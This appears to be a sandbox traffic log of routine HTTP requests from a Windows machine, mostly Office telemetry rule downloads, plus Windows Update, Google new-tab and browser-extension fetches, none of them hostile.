Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=5x1TTNvoAxBWSo2&MD=oay1reMr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1731342782&P2=404&P3=2&P4=jCepJcRRVHpViLAx0HdyicHFWvDp%2f5aICQuSaPvbLQabOY%2buYQu9mgQJ4xcs91UwZSnSXzcLFqavbZiY4BPnoQ%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: 3IYEXW130TRDtXgknWiv4/Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
